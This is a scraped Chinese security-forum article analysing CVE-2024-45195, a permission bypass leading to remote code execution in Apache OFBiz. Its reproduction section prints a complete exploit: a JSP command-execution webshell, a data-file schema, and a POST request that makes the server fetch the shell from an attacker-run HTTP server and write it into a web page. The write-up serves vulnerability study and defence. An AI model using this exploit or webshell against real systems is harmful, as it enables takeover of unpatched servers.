f5qVqvOnW6k6f4aVqvNnWqk6f5aVqvOftVJ1/mwrVefPsVJ1/lwrVefPs1J1/nwr2v+5wErV/wutVP2/2ErV/0ustPsTkfxhoXicrL0JYFvVlTD87n3aV2u3LVvWYkl2HCu2ZUl2nNjPibM6GyGrQxKFhCRAEkKAsIYIaIeUJYQBSsO0YEjLsJXSQqa0LBVbof0oy7TTUjpQt512Ol9ppzt0Gr3859z7nvTkWCTM9yfWffu9525nv+cKegH+iYdEk+AQ4kKn0C/MEwQS8PcMkWxvMhF1EoM3YDSk6BBJJnrhZk/A74Wb0RnUaPD6e3KEXaZI5RE/J72/sDRYXu/rm3V04HXz7Yeal/STphs7g8HXl7++fHT09ablzWOdh8yeBgu5zmw+7mg1249bGrdZLMftMYv9uDlI7v6F2fz6wNFZfX2vWxo/uLGJ9C9pPtTZvLzp9dFRyOP1pqYNnYcsDR4zNUFJx+3mVshhm6XR8hQ7NQuiIJwsioIoCXVCm9AF9Yr0ZDOu3kQsEjX4XF5/Wu9zkGgimYmlSNI1SHKREAm4HMTYQXxQt2yGjBPB4XY75CKmRCDZlVkitWcJybarx4LkbnITAR6zl2TJ4ZbG27PZ9nF8qchfkvHlcXwOza0DuP4uviYuFDxChzAozAfIEoMkRAzGEBkkmTRAkCIz4EbAn81lE8mEwYiPAwhmwuDh3ZGAR/5AiBgdcDNpNIRIjhJdU2aaranRNTCUlOjYyMgYvdb5qU2bjtR7l69e++XcrFuuW0gkeu7SpfvOeSM02k+Cb2R7t2z95dpV7vmLf3qswfeK3RKzk2JwmjWY6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLR
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-name,.hljs-tag{color:#00f}.hljs-string{color:#a31515}.hljs-attr{color:red}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.mar
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">ofbiz权限绕过远程执行漏洞(CVE-2024-45195)</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
在ofbiz的新版本中,对ProgramExport和EntitySQLProcessor添加了权限校验,如果需要造成命令执行,就需要寻找其他的可执行命令点,这里是viewdatafile,该漏洞可是说是对cve-2024-36104的绕过
</div>
<textarea id=md_view_content style=display:none value="一、漏洞简介
------
CVE-2024-45195算是对前些漏洞,比如 CVE-2024-36104的绕过,在之前的漏洞利用点中,最常使用的两个模板ProgramExport和EntitySQLProcessor
但是自从18.12.14开始,这两个模板添加了权限的校验
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ccc93bd35116c849a3023f22ee81a679284d17f1.png)
虽然添加了权限的校验,但是模板覆写导致端点不同导致权限绕过的问题还是可能存在的
二、影响版本
------
ofbiz≤18.12.15
三、环境搭建
------
从https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.15 下载源码
idea打开之后,配置gradle,执行下面的build得到jar包
![image (1).png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-b9e199b4f213914b58b1d71dae05711ccc05d515.png)
最后执行数据导入,在下载的文件夹的根目录执行gradlew loadAll
开始调试即可
四、漏洞原理分析
--------
对于权限的绕过,在https://forum.butian.net/article/524 以及描述的很清楚了,主要就是两个函数收到的不同端点来处理业务
这里分析一下viewdatafile.groovy这个文件是如何替代ProgramExport和EntitySQLProcessor来执行命令的
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-69773f8158d4ce639ac33f1a06b7f7e2dd5cfa33.png)
首先接收DATAFILE\_SAVE,ENTITYXML\_FILE\_SAVE,DATAFILE\_LOCATION,DEFINITION\_LOCATION,DEFINITION\_NAME,DATAFILE\_IS\_URLDEFINITION\_IS\_URL这些参数
然后根据dataFileIsUrl和definitionIsUrl这两个参数的值是否为true,来设置dataFileUrl和definitionUrl为URL类型的值
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ca939c521b5683cc1a8935e54f23890bc87f4724.png)
如果definitionUrl有值,则进入getModelDataFileReader方法
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-58efc1ca67915fc6c399dbf1dbc377eb07aa32e6.png)
先从readers里面读取,如果没有的话就根据传入的url来创建一个
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-a9e9edc4d3ae7d03ff2fcd2836c686b6eef387dc.png)
这里`createModelDataFiles` 方法里面就去远程读取xml文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-7bbffb5c3a9c278f5fb92f9a22054981f33b31b0.png)
xml文档的示例在[](https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz%27s+Data+File+Tools)<https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz's+Data+File+Tools>
后续就是对xml文档的解析,然后返回这个xml文档的句柄 `reader.getDataFileNames()).iterator()` 得到该xml文档data-file属性的迭代对象
进入readFile方法
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c76b1c3e6441be604bf82df0e6545c32c0e9fd68.png)
这里第一步就是重复上面的步骤,返回一个xml文档的DataFile对象
回到readFile
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-5012d559ec847934c56f39bc6463152f71eb9ed7.png)
进入readDataFile方法
这里也有一个与之前类似的方法,读取外部的链接,然后setupStream方法保存
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-6e7d66e2e5fc5b2f336f669800f0e1ca1b3a4bd5.png)
在setupStream方法的调用流里面需要注意的点是,远程读取了恶意的jspshell之后,后续会根据之前读取的xml配置文件里面配置的length长度来读取,并且根据name属性来保存成一个key value的形式以便后续读取
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-01dfe7622aeb74c53f42a60d77589a0216c73600.png)
回到viewdatafile.groovy
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-9e220a427e1a4b35d88318afa323bd0d864ad5c0.png)
`getModelDataFile` 返回数据模型对象
进入`writeDataFile` 方法,传入文件保存位置的参数
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d08a8be3d42754c0209cfa5e1b8f55996e96cfee.png)
在`writeDataFile` 当中保存shell
五、漏洞复现
------
创建文件rcereport.txt
```jsx
<% Runtime.getRuntime().exec(request.getParameter(&quot;cmd&quot;));%>
```
rceschema.xml
```jsx
<data-files xsi:noNamespaceSchemaLocation=&quot;<http://ofbiz.apache.org/dtds/datafiles.xsd>&quot; xmlns:xsi=&quot;<http://www.w3.org/2001/XMLSchema-instance>&quot;>
<data-file name=&quot;jspshell&quot; separator-style=&quot;fixed-length&quot; type-code=&quot;text&quot; start-line=&quot;0&quot; encoding-type=&quot;UTF-8&quot;>
<record name=&quot;jspshell&quot; limit=&quot;many&quot;>
<field name=&quot;jspshell&quot; type=&quot;String&quot; length=&quot;60&quot; position=&quot;0&quot;></field>
</record>
</data-file>
</data-files>
```
rceschema.xml里面几个主要的值
data-file必须和数据包里的DEFINITION\_NAME值相同
length长度为rcereport.txt-1
在这两个文件的目录下起一个python http服务 `python -m http.server`
发送数据包即可
```jsx
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: JSESSIONID=2778A721833652B44A6A08356E4855B3.jvm1; OFBiz.Visitor=10000
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: cross-site
Content-Length: 246
DATAFILE_LOCATION=http://127.0.0.1:8000/rcereport.txt&amp;DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&amp;DATAFILE_IS_URL=true&amp;DEFINITION_LOCATION=http://127.0.0.1:8000/rceschema.xml&amp;DEFINITION_IS_URL=true&amp;DEFINITION_NAME=jspshell
```
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-af8fca943856c7a11cb2f00e320b49cb3d0afa75.png)
最后访问/accounting/index.jsp?cmd=calc
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-79dceea47ef13890a85ab5a89d4fb7d1a937e8ba.png)
六、总结
----
CVE-2024-45195和之前的CVE-2024-36104的执行命令方式大致相似,只不过是将ProgramExport和EntitySQLProcessor换成了viewdatafile来执行代码">一、漏洞简介
------
CVE-2024-45195算是对前些漏洞,比如 CVE-2024-36104的绕过,在之前的漏洞利用点中,最常使用的两个模板ProgramExport和EntitySQLProcessor
但是自从18.12.14开始,这两个模板添加了权限的校验
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ccc93bd35116c849a3023f22ee81a679284d17f1.png)
虽然添加了权限的校验,但是模板覆写导致端点不同导致权限绕过的问题还是可能存在的
二、影响版本
------
ofbiz≤18.12.15
三、环境搭建
------
从https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.15 下载源码
idea打开之后,配置gradle,执行下面的build得到jar包
![image (1).png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-b9e199b4f213914b58b1d71dae05711ccc05d515.png)
最后执行数据导入,在下载的文件夹的根目录执行gradlew loadAll
开始调试即可
四、漏洞原理分析
--------
对于权限的绕过,在https://forum.butian.net/article/524 以及描述的很清楚了,主要就是两个函数收到的不同端点来处理业务
这里分析一下viewdatafile.groovy这个文件是如何替代ProgramExport和EntitySQLProcessor来执行命令的
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-69773f8158d4ce639ac33f1a06b7f7e2dd5cfa33.png)
首先接收DATAFILE\_SAVE,ENTITYXML\_FILE\_SAVE,DATAFILE\_LOCATION,DEFINITION\_LOCATION,DEFINITION\_NAME,DATAFILE\_IS\_URLDEFINITION\_IS\_URL这些参数
然后根据dataFileIsUrl和definitionIsUrl这两个参数的值是否为true,来设置dataFileUrl和definitionUrl为URL类型的值
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ca939c521b5683cc1a8935e54f23890bc87f4724.png)
如果definitionUrl有值,则进入getModelDataFileReader方法
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-58efc1ca67915fc6c399dbf1dbc377eb07aa32e6.png)
先从readers里面读取,如果没有的话就根据传入的url来创建一个
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-a9e9edc4d3ae7d03ff2fcd2836c686b6eef387dc.png)
这里`createModelDataFiles` 方法里面就去远程读取xml文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-7bbffb5c3a9c278f5fb92f9a22054981f33b31b0.png)
xml文档的示例在[](https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz%27s+Data+File+Tools)&lt;https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz's+Data+File+Tools&gt;
后续就是对xml文档的解析,然后返回这个xml文档的句柄 `reader.getDataFileNames()).iterator()` 得到该xml文档data-file属性的迭代对象
进入readFile方法
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c76b1c3e6441be604bf82df0e6545c32c0e9fd68.png)
这里第一步就是重复上面的步骤,返回一个xml文档的DataFile对象
回到readFile
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-5012d559ec847934c56f39bc6463152f71eb9ed7.png)
进入readDataFile方法
这里也有一个与之前类似的方法,读取外部的链接,然后setupStream方法保存
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-6e7d66e2e5fc5b2f336f669800f0e1ca1b3a4bd5.png)
在setupStream方法的调用流里面需要注意的点是,远程读取了恶意的jspshell之后,后续会根据之前读取的xml配置文件里面配置的length长度来读取,并且根据name属性来保存成一个key value的形式以便后续读取
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-01dfe7622aeb74c53f42a60d77589a0216c73600.png)
回到viewdatafile.groovy
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-9e220a427e1a4b35d88318afa323bd0d864ad5c0.png)
`getModelDataFile` 返回数据模型对象
进入`writeDataFile` 方法,传入文件保存位置的参数
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d08a8be3d42754c0209cfa5e1b8f55996e96cfee.png)
在`writeDataFile` 当中保存shell
五、漏洞复现
------
创建文件rcereport.txt
```jsx
&lt;% Runtime.getRuntime().exec(request.getParameter("cmd"));%&gt;
```
rceschema.xml
```jsx
&lt;data-files xsi:noNamespaceSchemaLocation="&lt;http://ofbiz.apache.org/dtds/datafiles.xsd&gt;" xmlns:xsi="&lt;http://www.w3.org/2001/XMLSchema-instance&gt;"&gt;
&lt;data-file name="jspshell" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8"&gt;
&lt;record name="jspshell" limit="many"&gt;
&lt;field name="jspshell" type="String" length="60" position="0"&gt;&lt;/field&gt;
&lt;/record&gt;
&lt;/data-file&gt;
&lt;/data-files&gt;
```
rceschema.xml里面几个主要的值
data-file必须和数据包里的DEFINITION\_NAME值相同
length长度为rcereport.txt-1
在这两个文件的目录下起一个python http服务 `python -m http.server`
发送数据包即可
```jsx
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: JSESSIONID=2778A721833652B44A6A08356E4855B3.jvm1; OFBiz.Visitor=10000
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: cross-site
Content-Length: 246
DATAFILE_LOCATION=http://127.0.0.1:8000/rcereport.txt&amp;DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&amp;DATAFILE_IS_URL=true&amp;DEFINITION_LOCATION=http://127.0.0.1:8000/rceschema.xml&amp;DEFINITION_IS_URL=true&amp;DEFINITION_NAME=jspshell
```
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-af8fca943856c7a11cb2f00e320b49cb3d0afa75.png)
最后访问/accounting/index.jsp?cmd=calc
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-79dceea47ef13890a85ab5a89d4fb7d1a937e8ba.png)
六、总结
----
CVE-2024-45195和之前的CVE-2024-36104的执行命令方式大致相似,只不过是将ProgramExport和EntitySQLProcessor换成了viewdatafile来执行代码</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h2 blockindex=0>一、漏洞简介</h2>
<p blockindex=1>CVE-2024-45195算是对前些漏洞,比如 CVE-2024-36104的绕过,在之前的漏洞利用点中,最常使用的两个模板ProgramExport和EntitySQLProcessor</p>
<p blockindex=2>但是自从18.12.14开始,这两个模板添加了权限的校验</p>
<p blockindex=3><img src=data:image/png;base64,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